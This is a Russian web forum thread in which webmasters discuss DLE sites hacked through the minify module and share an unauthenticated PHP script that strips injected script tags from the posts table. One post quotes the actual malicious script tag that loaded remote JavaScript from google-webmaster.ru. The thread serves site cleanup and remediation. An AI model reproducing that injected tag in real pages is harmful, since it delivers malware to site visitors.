Помощник
|
Взлом DLE |
GET_ini
|
Сообщение
#1
|
||
|
|
||
|
|||
install |
15.9.2013, 23:46;
Ответить: install
Сообщение
#2
|
|
GET_ini, в БД скрипты левые посмотрите
в поиске ищите script, если есть, то туда залили точно в БД сидит создайте php файл, залейте в корень сайта и выполните его. БД почистится, но нужно искать дыру, снова закинут его. Развернуть/Свернуть
<?php
if(isset($_GET['blank'])) die(); error_reporting(0); set_time_limit(0); function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } if(get_magic_quotes_gpc()) $_POST = stripslashes_array($_POST); session_start (); define ( 'DATALIFEENGINE', true ); $member_id = FALSE; $is_logged = FALSE; define('ROOT_DIR', dirname( __FILE__ )); define('ENGINE_DIR', ROOT_DIR.'/engine'); require_once ROOT_DIR.'/engine/init.php'; ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <title>Доктор DLE от SEO-KinG.RU</title> <style type="text/css"> body, td, th { color: #333; font-family: Arial; font-size: 14px; } </style> </head> <body> <?php if(isset($_POST['submit'])) { echo '<div id="result">'; $posts = $db->query("SELECT `id`, `full_story`, `short_story` FROM `".PREFIX."_post`"); while($post = $db->get_row($posts)) { $post['full_story'] = preg_replace('/(<script.*<\/script>)/Usi', '', $post['full_story']); $post['short_story'] = preg_replace('/(<script.*<\/script>)/Usi', '', $post['short_story']); $sql = 'UPDATE `'.PREFIX.'_post` SET `full_story`="'.mysql_escape_string($post['full_story']).'", `short_story`="'.mysql_escape_string($post['short_story']).'" WHERE `id`='.$post['id']; $db->query($sql); } echo 'Готово'; echo '</div>'; } ?> <form action="" method="post"> <input type="submit" name="submit" value="Начать" /> </form> </body> </html> Сообщение отредактировал install - 15.9.2013, 23:52 -------------------- |
|
|
DukeNukem |
15.9.2013, 23:50;
Ответить: DukeNukem
Сообщение
#3
|
|
<script async="async" type="text/javascript" src="http://google-webmaster.ru/767c23430487b6c64d45b83d5d32e9a1.js"></script> Вот вредоносный код, на сайте клиента был в базе данных -------------------- |
|
|
install |
15.9.2013, 23:55;
Ответить: install
Сообщение
#4
|
|
DukeNukem, еще может быть yandex-webmaster
GET_ini, если не поможет, замените script на object в файлике. DLE обновил я с утра тоже почистил один сайт БД, обновил двиг. Сижу целый день наблюдаю за ним, обратной вставки пока не было. Сообщение отредактировал install - 15.9.2013, 23:58 -------------------- |
|
|
Belos |
16.9.2013, 12:38;
Ответить: Belos
Сообщение
#5
|
|
Аналогичная ситуация и у меня на одном сайте. Кто-то нашел где эта бяка находится?
|
|
|
install |
16.9.2013, 12:50;
Ответить: install
Сообщение
#6
|
|
Belos, замените файл с дистрибутива /engine/classes/min/index.php
http://dle-news.ru/bags/v10/1580-potencial...ule-minify.html а то руками прописывал, не помогло, а в дистрибе там этот код не сверху а чуть ниже прописан. ну и перед тем как менять будете, в папке engine/cache/system почистите всю лабуду-буду вчера менял на нескольких сайтах, пока не достают. -------------------- |
|
|
AMILO |
18.9.2013, 0:43;
Ответить: AMILO
Сообщение
#7
|
|
а то руками прописывал, не помогло, а в дистрибе там этот код не сверху а чуть ниже прописан. ну и перед тем как менять будете, в папке engine/cache/system почистите всю лабуду-буду вчера менял на нескольких сайтах, пока не достают. А можете скинуть Ваш файл /engine/classes/min/index.php??? А как базу очистили? Вручную удаляли каждый скрипт или есть какой-то "быстрый" способ?! -------------------- |
|
|
Schmied |
18.9.2013, 15:12;
Ответить: Schmied
Сообщение
#8
|
|
А как базу очистили? Вручную удаляли каждый скрипт или есть какой-то "быстрый" способ?! я нашёл отличный скрипт в инете для массовой чистки базы. сделал два варианта - для внедрений типа script и для object заливаете в корень сайта - запускаете, нажимаете кнопочку и всё - новости чистые. а вот статические не получается скриптом, но их обычно немного, можно и руками почистить. прикладываю сами файлы - пользуемся скачать с яндекс Сообщение отредактировал Schmied - 18.9.2013, 15:12 |
|
|
Belos |
18.9.2013, 15:16;
Ответить: Belos
Сообщение
#9
|
|
А тут что, трудно посмотреть скрипт чистки БД?
|
|
|
Schmied |
18.9.2013, 16:04;
Ответить: Schmied
Сообщение
#10
|
|
Belos, да, согласен. проглядел. это то же самое ну ничего, пусть будут и уже готовые файлы...
А можете скинуть Ваш файл /engine/classes/min/index.php??? присоединяюсь к просьбе, я тоже руками прописывал. интересно глянуть, в чём отличие нового файла от старого. может ещё что-то прописали разрабы, а в теме багфикса этого не указали...? Сообщение отредактировал Schmied - 18.9.2013, 15:27 |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
DLE xProtect | 2 | xoopw | 5989 | 15.1.2024, 21:06 автор: Diana_Wesley |
|
Обновить сайт на CMS DLE | 1 | Sawich | 1671 | 2.9.2023, 10:10 автор: WoWeb |
|
Изготовление красивых сайтов на DLE под ключ | Доступные цены от 2000 руб. |
1 | Admiral_ukr | 1603 | 20.11.2022, 10:08 автор: Webmaster24 |
|
Ищу спеца по DLE вылечить сайт | 4 | Reactive | 2645 | 22.10.2022, 9:01 автор: Fozik77 |
|
требуется перенос с Dle на wordpres нужен человек для переноса движка |
5 | Юрий82 | 1952 | 30.7.2022, 18:02 автор: Klerik84 |
Текстовая версия | Сейчас: 26.4.2024, 5:19 |